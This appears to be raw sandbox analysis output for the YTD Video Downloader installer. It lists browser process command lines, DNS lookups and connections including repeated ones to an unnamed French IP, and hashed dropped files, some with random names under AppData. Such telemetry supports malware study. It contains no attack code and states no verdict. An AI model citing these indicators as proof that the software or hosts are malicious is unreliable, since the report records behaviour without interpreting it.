"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2228,10212125485070641529,7624058994641401383,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3972 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.ytddownloader.com/premium.html?lngid=1033&lt=f&isn=CC0F6E83FD38442798C60B854E5A05E8&av=5.9.18&ft=4&kt=ytdd

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff9eee646f8,0x7ff9eee64708,0x7ff9eee64718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2228,10212125485070641529,7624058994641401383,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5088 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2228,10212125485070641529,7624058994641401383,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5312 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2228,10212125485070641529,7624058994641401383,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5608 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2228,10212125485070641529,7624058994641401383,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5128 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2228,10212125485070641529,7624058994641401383,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5676 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2228,10212125485070641529,7624058994641401383,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5680 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2228,10212125485070641529,7624058994641401383,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5680 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2228,10212125485070641529,7624058994641401383,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4864 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2228,10212125485070641529,7624058994641401383,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5132 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2228,10212125485070641529,7624058994641401383,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3904 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2228,10212125485070641529,7624058994641401383,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5732 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2228,10212125485070641529,7624058994641401383,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2076 /prefetch:2

Network

Country Destination Domain Proto
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 2.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 www.ytddownloader.com udp
US 107.23.224.174:80 www.ytddownloader.com tcp
US 107.23.224.174:443 www.ytddownloader.com tcp
US 8.8.8.8:53 174.224.23.107.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 107.23.224.174:80 www.ytddownloader.com tcp
US 107.23.224.174:443 www.ytddownloader.com tcp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 www.ytddownloader.com udp
US 44.194.21.141:443 www.ytddownloader.com tcp
US 107.23.224.174:80 www.ytddownloader.com tcp
US 107.23.224.174:80 www.ytddownloader.com tcp
US 8.8.8.8:53 141.21.194.44.in-addr.arpa udp
US 8.8.8.8:53 39.78.162.3.in-addr.arpa udp
US 8.8.8.8:53 92.116.64.18.in-addr.arpa udp
US 107.23.224.174:443 www.ytddownloader.com tcp
US 8.8.8.8:53 ocsp.r2m02.amazontrust.com udp
DE 3.162.87.26:80 ocsp.r2m02.amazontrust.com tcp
US 8.8.8.8:53 app.termly.io udp
US 8.8.8.8:53 ajax.googleapis.com udp
GB 216.58.212.234:443 ajax.googleapis.com tcp
US 104.18.31.234:443 app.termly.io tcp
US 104.18.31.234:443 app.termly.io tcp
US 8.8.8.8:53 26.87.162.3.in-addr.arpa udp
US 8.8.8.8:53 202.212.58.216.in-addr.arpa udp
US 8.8.8.8:53 234.212.58.216.in-addr.arpa udp
US 8.8.8.8:53 234.31.18.104.in-addr.arpa udp
US 8.8.8.8:53 195.187.250.142.in-addr.arpa udp
US 44.194.21.141:80 www.ytddownloader.com tcp
US 44.194.21.141:443 www.ytddownloader.com tcp
GB 172.217.169.78:80 www.google-analytics.com tcp
US 44.194.21.141:443 www.ytddownloader.com tcp
US 44.194.21.141:443 www.ytddownloader.com tcp
US 44.194.21.141:443 www.ytddownloader.com tcp
US 8.8.8.8:53 232.212.58.216.in-addr.arpa udp
US 8.8.8.8:53 78.169.217.172.in-addr.arpa udp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 js.braintreegateway.com udp
US 8.8.8.8:53 pay.google.com udp
SE 192.229.221.25:443 js.braintreegateway.com tcp
SE 192.229.221.25:443 js.braintreegateway.com tcp
SE 192.229.221.25:443 js.braintreegateway.com tcp
SE 192.229.221.25:443 js.braintreegateway.com tcp
NL 142.250.102.92:443 pay.google.com tcp
US 8.8.8.8:53 56.163.245.4.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 www.google.com udp
GB 216.58.204.68:443 www.google.com tcp
NL 142.250.102.92:443 pay.google.com udp
US 8.8.8.8:53 google.com udp
GB 172.217.16.238:443 google.com tcp
GB 216.58.204.68:443 www.google.com udp
GB 216.58.204.68:443 www.google.com udp
NL 142.250.102.92:443 pay.google.com udp
US 8.8.8.8:53 pay.sandbox.google.com udp
NL 142.250.102.81:443 pay.sandbox.google.com tcp
US 8.8.8.8:53 92.102.250.142.in-addr.arpa udp
US 8.8.8.8:53 25.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 68.204.58.216.in-addr.arpa udp
US 8.8.8.8:53 238.16.217.172.in-addr.arpa udp
US 8.8.8.8:53 81.102.250.142.in-addr.arpa udp
US 8.8.8.8:53 play.google.com udp
GB 142.250.179.238:443 play.google.com tcp
GB 142.250.179.238:443 play.google.com tcp
GB 142.250.179.238:443 play.google.com tcp
GB 142.250.179.238:443 play.google.com tcp
GB 142.250.179.238:443 play.google.com tcp
GB 142.250.179.238:443 play.google.com udp
US 8.8.8.8:53 75.117.19.2.in-addr.arpa udp
US 8.8.8.8:53 238.179.250.142.in-addr.arpa udp
FR 185.244.213.64:80 tcp
FR 185.244.213.64:80 tcp
FR 185.244.213.64:80 tcp
FR 185.244.213.64:80 tcp
FR 185.244.213.64:80 tcp
FR 185.244.213.64:80 tcp
FR 185.244.213.64:80 tcp
FR 185.244.213.64:80 tcp
FR 185.244.213.64:80 tcp
FR 185.244.213.64:80 tcp
FR 185.244.213.64:80 tcp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
FR 185.244.213.64:80 tcp
FR 185.244.213.64:80 tcp
FR 185.244.213.64:80 tcp
FR 185.244.213.64:80 tcp
FR 185.244.213.64:80 tcp
FR 185.244.213.64:80 tcp
FR 185.244.213.64:80 tcp

Files

memory/1028-0-0x0000000000400000-0x0000000000501000-memory.dmp

memory/1028-2-0x0000000000401000-0x00000000004B7000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-JUJ61.tmp\cd51b02027d6e08d86b90eaa03b3ecf6ea777a129b9bca1631fdf4ea278e1269.tmp

MD5 34fb289e9fee64cd7d4b588f0af35a87
SHA1 749822f7891caaca3fcda698a1f3a88afa76b26c
SHA256 61fbf0a6084bd7bab3ed214f1c372a569af302ee353e59ddb4f9f65436bf9b55
SHA512 9bc594e241747faadb3295792eff37c76a6f4ff1a0f0c91e63fd45905da15239a1aed8bba55006f32310633609fa43132616cbea30b3a104843f2b553b58adaa

memory/1576-6-0x0000000000400000-0x0000000000723000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\_isetup\_isdecmp.dll

MD5 c6ae924ad02500284f7e4efa11fa7cfc
SHA1 2a7770b473b0a7dc9a331d017297ff5af400fed8
SHA256 31d04c1e4bfdfa34704c142fa98f80c0a3076e4b312d6ada57c4be9d9c7dcf26
SHA512 f321e4820b39d1642fc43bf1055471a323edcc0c4cbd3ddd5ad26a7b28c4fb9fc4e57c00ae7819a4f45a3e0bb9c7baa0ba19c3ceedacf38b911cdf625aa7ddae

C:\Users\Admin\AppData\Local\Temp\is-7TM00.tmp\YTDSetup.exe

MD5 37c8ee1cae9779ec094be29a35a5061d
SHA1 ae99157bda438ad024e38dd91a975246b00dd557
SHA256 0ac4b34f2a8f9c004f6c942ce112a0ab87bb1c2b17a7dd745519eb414ebdae35
SHA512 e725a2ec6f3550e8de89b200f4bb79f808f14d6da04d4a80629ecb1b428ba0c74a0468e7b7bb53d89744bbba19066f4799e3a84951d21215ce0b72edf0798728

C:\Users\Admin\AppData\Local\Temp\nseC304.tmp\NSISHelper.dll

MD5 373c6ac98ae82cf341394215d28b5830
SHA1 2e3542372f1e520cdd47d30035dda85fdd2b11f9
SHA256 5cfd1ab1740c4a68cae314157468423dcd7b0ffe873b91257e10fa28169a7d18
SHA512 6d0a31a6c5c4b965633f943eaa15d3495be072f035d97deac27690d6a6a6890a8f817b406153fbba5a8862675b4f3015ac9e93fc8b6d90b1c4b029857123a117

C:\Users\Admin\AppData\Local\Temp\nseC304.tmp\System.dll

MD5 0d7ad4f45dc6f5aa87f606d0331c6901
SHA1 48df0911f0484cbe2a8cdd5362140b63c41ee457
SHA256 3eb38ae99653a7dbc724132ee240f6e5c4af4bfe7c01d31d23faf373f9f2eaca
SHA512 c07de7308cb54205e8bd703001a7fe4fd7796c9ac1b4bb330c77c872bf712b093645f40b80ce7127531fe6746a5b66e18ea073ab6a644934abed9bb64126fea9

C:\Users\Admin\AppData\Local\Temp\nseC304.tmp\nsisdl.dll

MD5 ba2cc9634ebed71cea697a31144af802
SHA1 8221c522b24f4808f66a476381db3e6455eab5c3
SHA256 9a3c2fe5490c34f73f1a05899ef60cfef05e0c9599cd704e524ef7a46ead67ba
SHA512 dcc74bcedd9402f7ac7e2d1872fe0e2876ae93cf8bbd869d5b9b7b56cea244ba8d2891fa2b51382092b86480337936f5ec495d9005d47fbfd9e2b71cb7f6ba8f

C:\Users\Admin\AppData\Local\Temp\nseC304.tmp\UserInfo.dll

MD5 9eb662f3b5fbda28bffe020e0ab40519
SHA1 0bd28183a9d8dbb98afbcf100fb1f4f6c5fc6c41
SHA256 9aa388c7de8e96885adcb4325af871b470ac50edb60d4b0d876ad43f5332ffd1
SHA512 6c36f7b45efe792c21d8a87d03e63a4b641169fad6d014db1e7d15badd0e283144d746d888232d6123b551612173b2bb42bf05f16e3129b625f5ddba4134b5b8

C:\Users\Admin\AppData\Local\Temp\nseC304.tmp\nsDialogs.dll

MD5 466179e1c8ee8a1ff5e4427dbb6c4a01
SHA1 eb607467009074278e4bd50c7eab400e95ae48f7
SHA256 1e40211af65923c2f4fd02ce021458a7745d28e2f383835e3015e96575632172
SHA512 7508a29c722d45297bfb090c8eb49bd1560ef7d4b35413f16a8aed62d3b1030a93d001a09de98c2b9fea9acf062dc99a7278786f4ece222e7436b261d14ca817

C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\ytd.exe

MD5 b1934b07dd28fe1ba94df3861128402b
SHA1 c5d918e696059437dacffa8c3359ee31e97e6e06
SHA256 2670c0406f42be2455f3a20e3ae8b024a41c46b956df9214cb63ca1efa18b17e
SHA512 e863702d96a1a8371403933d9a0e082498d15a39fcf0bedb981913981f8cd9dab64e54202c4a7f2b4c6e4407fd3a7bdb9b0a96340b258476cf59057e80cbbc7f

memory/1028-139-0x0000000000400000-0x0000000000501000-memory.dmp

memory/1576-141-0x0000000000400000-0x0000000000723000-memory.dmp

memory/2912-143-0x0000000005340000-0x0000000005376000-memory.dmp

memory/3680-144-0x0000000004DC0000-0x00000000053E8000-memory.dmp

memory/1520-146-0x00000000061E0000-0x0000000006246000-memory.dmp

memory/1520-147-0x0000000006250000-0x00000000062B6000-memory.dmp

memory/1520-145-0x0000000006140000-0x0000000006162000-memory.dmp

memory/1520-163-0x00000000062D0000-0x0000000006624000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vlioe40t.gjm.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1576-254-0x0000000000400000-0x0000000000723000-memory.dmp

memory/1028-256-0x0000000000400000-0x0000000000501000-memory.dmp

memory/1520-252-0x0000000006EA0000-0x0000000006EEC000-memory.dmp

memory/1520-251-0x00000000068E0000-0x00000000068FE000-memory.dmp

C:\Users\Admin\d4c96d281fd0f998028d3d01bfc34319\d83898868d3ea2886e940309afb0d975\add01c2553610a23ebc2f315949f35d4\558732735d58c0d6df02d0db147134e2\b67aff63b5589771446b4ba1056a0a70\a23569a279f49e7862d059e43fd1efa5\1d665c87ae5382646caaac5af0879c63

MD5 534663c23d71911a74d42510bd20a035
SHA1 0b634216f6b035edfafdccd861077c6d48734958
SHA256 3accca2af3b6f02d42eb4db86e49dbff6dace4a4d62fc3859cafd268b8751d50
SHA512 08c90730895189e9ade2f0bc83c1c9e8ebb53e57323d8562bd21f66afc38b592185bac06519678bfdd6168e3544bc63ddc5340269174125e8bad07d06dcef114

C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\libvlccore.dll

MD5 3c07164ceba1068ee3eff672d8e11eb6
SHA1 c96d644ad20a788100609061c052220828784a09
SHA256 170a18f9d841606432b9157f243c43c7a2d53bf1fc028a147bd15f505749e69a
SHA512 af48e1d10f442789df7edaa89b7364f7670134af7f8c624b22073eadaf3516cf10aab196b411835afb839c0256314eb3d75fec37afe3f78f5e5fe123b3ffef4f

C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\libvlc.dll

MD5 ded3aa6b7920334e6b334eaed3db96c5
SHA1 43ddc57d22dce102a3687e548bd36e32fe20495e
SHA256 feed76629d5f9dbe7401a326994e80b003ca5fe1cf876029e4707a71bf4b5860
SHA512 aeec44f69d430a544594433a8e830af075cad27a7dfe83401ee82e51a949d1140e253ee49f786b944ddf98f513f3754eda6bf0311288eddf7ad1a73d8110de9c

memory/1520-285-0x0000000006D80000-0x0000000006D9A000-memory.dmp

memory/1520-293-0x00000000081B0000-0x0000000008754000-memory.dmp

C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\scripts.yds

MD5 d8ced7c2193354757988028fbdbf197e
SHA1 23e7c13471207cc7abd0267f11f9c814bece7011
SHA256 6b384b1e208a2260f54e3d003449c53c03acd8947c8762060fd9e9832dc3bd9c
SHA512 96db2348c6c8f00fb14321b3b816a1a59a60bc54f66002253d6ac43768c94aca5ec3435069e17a23426034bd583c350cdfbcb9daf4b258a8fd485bc96a34f908

memory/1520-286-0x0000000006DD0000-0x0000000006DF2000-memory.dmp

memory/1520-284-0x0000000007960000-0x00000000079F6000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 e765f3d75e6b0e4a7119c8b14d47d8da
SHA1 cc9f7c7826c2e1a129e7d98884926076c3714fc0
SHA256 986443556d3878258b710d9d9efbf4f25f0d764c3f83dc54217f2b12a6eccd89
SHA512 a1872a849f27da78ebe9adb9beb260cb49ed5f4ca2d403f23379112bdfcd2482446a6708188100496e45db1517cdb43aba8bb93a75e605713c3f97cd716b1079

C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\audio_output\libdirectsound_plugin.dll

MD5 46672363f47a25d69a5324045f4e8d63
SHA1 f0d65ad9301f953f7b604087d27ce3e600891250
SHA256 0a2f80092b426f11dbf54b10542d3d7b45d2e40fc575e8e0e73cdcca47b4885d
SHA512 24b52206390b04cb909a1da12b46294f2aa848a42c27a6d765e6666ffbf86f64bac929e9210723d5c537a11d015d2f556e39821d01310a328cf41c988a25146b

C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\audio_filter\libtrivial_channel_mixer_plugin.dll

MD5 43f19a5d4d42e3cd6514348ba5fbdd96
SHA1 1f708f75fb1024be8b3f6e51ac465664f9414e29
SHA256 634e0e8bcecde4375f1f9510980bc2bf95495acfc8d0a14d15307c49829b4b2a
SHA512 bee50cdaeb50c888bd7df7ed789983a47ce6a50ab8bbba006519640530de8744f164628e741be8cd106cc229de1ca5f63ce23f41e94343869e8ba1aadd840f41

C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\audio_mixer\libinteger_mixer_plugin.dll

MD5 d4f826e68b616cccc1de1e5ef07738b8
SHA1 e35d6657f4de4826d790c935f94ce41320d09b00
SHA256 1b64f39162f9918597019a89068edb9607caae194fd80b5367df08ed06ed5a78
SHA512 877df9980a3951d9f65983ddfac5df8026229e99618cd05b6c803e754074d760c5f4308cd54a1c7e7ba8f65ef684ea43eaa06ebebd4e1a38441ea9a63b47c956

C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\audio_mixer\libfloat_mixer_plugin.dll

MD5 04a21f5ee0a9c27ca5e5dae050f3d275
SHA1 44835c934ec2a4e37a75023317798837e412e34f
SHA256 ef0fdefcf8af37c1ebaca95e79279907a389915d09e81da38fea9ff17afb1acc
SHA512 6fb0b523288c70f11cd1fae8bed774266956033352df6e9dea3f3881a9b971f0d13eddf9d6d124edccc4dc7ead9441749b091017b3f9ed2b33f887a1f8f660fa

C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\audio_filter\libugly_resampler_plugin.dll

MD5 a3297b187aba1024501007bce77eeec4
SHA1 66b0d789f0fc6e465827bc372047ae1b57fb209c
SHA256 bf000179818fd3db857f7f46dca974698258fc11acf518fd77df4f5a9de05bbd
SHA512 8528aedc44bfb827fa2b5c9fe7c36152daa2e7c4cec32b8eabd8167dca4deadbe3dbd2b4723f00355a1f77cca1ff8c3275cc33c85454ef3e951a72bd1a6a407f

C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\audio_filter\libaudio_format_plugin.dll

MD5 91074f5c7288c67eaed2c2c657e373d3
SHA1 84aecb92336c668bd834a749081eaf1e476c38e4
SHA256 085dc559b88b1687b2918b8ee797734adfbbaa233ba7d8f0e8b5abea8740ca51
SHA512 579a27e5f3565efe46a47034f2880782c5a947b56e65118e8cbc58c886ec805ce39593becce5df4aeb851adc12fc22fd3db450c67b864a618dea05822c58a4a4

C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\access\libfilesystem_plugin.dll

MD5 ab0a22194181d6d6ff01123dc9a376ce
SHA1 006355a4240c874443db242ec4d79b8f61e149be
SHA256 4d03b0edd616098fa390a41f8d68f6b77f4c96abf0bbf1578e310c1846017da1
SHA512 1db197bf8e99cd3e729a481a6f24fe1b090a12679a6ab5b6334e26a8442bd80d25379104c475fc9a70111b8c57ca048c4a3f40eb6e667814cce9ab1c86b6253e

C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\video_output\libwingdi_plugin.dll

MD5 ccc67f588880568bfd46c4b8140f41aa
SHA1 5d37e43434dc31d55624bfd481c816bd2a285b6d
SHA256 8f42dafb5528c09248478913ba39b6381128c28eace727b488d639f36e614a7d
SHA512 5ac2ae619bb27a4c8cd2fdbed454d930cb5ed8ffa134ab6e9eb84c156650955b7eb1ab4542e5477f7aebad95194dd0dd751dfc508781d9820079d8189ef45092

C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\video_output\libvmem_plugin.dll

MD5 3dee8d41db28133b3d00bfdf0fd16eaf
SHA1 55f447676e8d94df25285155f6974583613395ed
SHA256 d6af06ae76f1409b16d2e781217b863a7b32d5ca953795f52d5aa54b0491272c
SHA512 6b222b39601210957082e490073b2d15caa0ccb94121385f4372a02f916a04d4c1824b0f897c875fa1a756d81d511f4ffa649dae7cc900c3746817e1049a67ac

C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\video_output\libdrawable_plugin.dll

MD5 6d9fa70a05698e9b6aa1c6074def16e8
SHA1 41b2e9aa0ed69a75a279cd3b57e5b4666e9ab991
SHA256 3ef1918ccb05373eb15f5298d083c1c0a8e171ed2ab321a6c2270f26c2185a5b
SHA512 a075bdba7c71664880549b6779d56fc5e354f1ed11eb1f50be68e4e6f81c7fc4b4ead6a7478e58c460f292aac02506d01d5c65a7b42cd4a65ef554b75a20eb01

C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\video_output\libdirect3d_plugin.dll

MD5 350983ab596397b2d2703d658baeea8c
SHA1 63205b4238ba14871bc44c7b14b61c43ea509f19
SHA256 36f5f233c3c01c8ddbe330a760d28c0733fc512ba5097daba5c992742e0a6571
SHA512 b923e096a0f0460055d8f959ea496625e87a939b0c054fb2331508d8905a3c19ef7dd9a0d327144a70a1ded62cfb602c42637fa2be1de69b1a74f61101fb962e

C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\video_filter\libswscale_plugin.dll

MD5 416108272cc56d4036d5796fbb1b8f3c
SHA1 66a7bb238eb0d4ba6543a0046df5324a8833cceb
SHA256 7bf969f40afb0ae30da950059a10868e1a20c0d64ed7da11fa5c9c7e0a123bc4
SHA512 682062f8d3b012242b3f679a16f1e4edf62f7918864488f49fcc8ee5b938989ec6828417c0f771ec2835e11688ce024dc84dbc859c70daac2fff87fab28019fa

C:\Program Files (x86)\GreenTree Applications\YTD Video Downloader\plugins\codec\libavcodec_plugin.dll

MD5 4088b4e4ea76db97544c76ef7f2af08c
SHA1 c862b32ed75b8ad1c029edd2c0f492fcb689f8e6
SHA256 2d7aff56a160ac39f7b68b34eb1e25bbeee8fca6034fee8f278abd0fb3dbc0d8
SHA512 66f664a8fc270bc611cc1c247fbe9a2b26baa900b7b38a35ac2d232b6af694914667eb066139e1a889b33e226b845f74f615b48ef84eb626fcf3db137468087c

memory/1520-345-0x0000000008DE0000-0x000000000945A000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 53bc70ecb115bdbabe67620c416fe9b3
SHA1 af66ec51a13a59639eaf54d62ff3b4f092bb2fc1
SHA256 b36cad5c1f7bc7d07c7eaa2f3cad2959ddb5447d4d3adcb46eb6a99808e22771
SHA512 cad44933b94e17908c0eb8ac5feeb53d03a7720d97e7ccc8724a1ed3021a5bece09e1f9f3cec56ce0739176ebbbeb20729e650f8bca04e5060c986b75d8e4921

\??\pipe\LOCAL\crashpad_3028_JWJVHCDTVCCWLVXQ

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 7be2a1c7d3942c24d35e3028c53d206c
SHA1 dda3e737fa12530dcd5f509deeb125f24408a533
SHA256 1562d306f7af3c3269867fb186ca554c59a84797c4e70d46754cc3a244e865ae
SHA512 e62f14c4d3df2c4dfe76141712c0fb59c13ab0f9e8dfdaef9cc7e5a3737e9ff0a6de88a788370dfc1a544ced37bd979354412a34e0d1c339c1a5068032e869b4

C:\Users\Admin\AppData\Roaming\Microsoft\PkVdmbAwgriyB\RlEKhDAJNzbPeQ.vxiwhopcDsCngBzVNul

MD5 4355894e549bbe210570d4ce7f6c81b6
SHA1 293664ad972e70cafec1f0b79ad6e778cf3c8660
SHA256 c7dae307c096f225ff4ec5c41fb8e74fa686581238340056b5e0cdbcedbcc9a8
SHA512 8c43194881100e1d92901b22ea765181c8c2b7c19451941e66873f83d317ec496dbf26eb1e8ddee7907216621b4259d59a241f3da82cd2aa1b664d96629476c9

C:\Users\Admin\AppData\Roaming\Microsoft\PkVdmbAwgriyB\iXMQpYCrnzlTSeRoIK.eSRprJviGdXIHqTo

MD5 d13a3b0940f65c8c8c752f0907cd4a58
SHA1 d902a44afc28af9d72afff5bf14081c0f0a24efa
SHA256 fd7ec271bb482c7a77af380ad9243361fade9fc6b3e94f940b7b7ccce478ee49
SHA512 e45841d466e0c5345aeb257ab5efedcb573000b7bbc5d2658462e877c8e9796cf33b97b726d65e5cd28cdc3466f51da8bbf1d97f6f51ca6ffbce0d96de21f755

C:\Users\Admin\AppData\Roaming\Microsoft\PkVdmbAwgriyB\KGjbIPfVMmWOXSniZU.UXaSrkvhRPICbd

MD5 ca2b6d0489c983595e64f9c195eba22a
SHA1 e306e80c19b2d5d7a97eee2301f39f50ebe7ad3a
SHA256 dd9c81835be015c56dd5d4dfe46b428102de92840ed1d6dda64f41b4eee333de
SHA512 9737b31bcaa9eb67f8aa32a19c2646379710228f20dc89df6db47e7f5a130c25c0b67545e26a1d3680da65a302a739f236a2c7a493f0d528c88833b2f43b3d4b

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\75CA58072B9926F763A91F0CC2798706_056B48C93C4964C2E64C0A8958238656

MD5 8d4cd94c44d11c4d9b71ea0e8afb996f
SHA1 fb1e51d822bd086009425410780fb5a38618a411
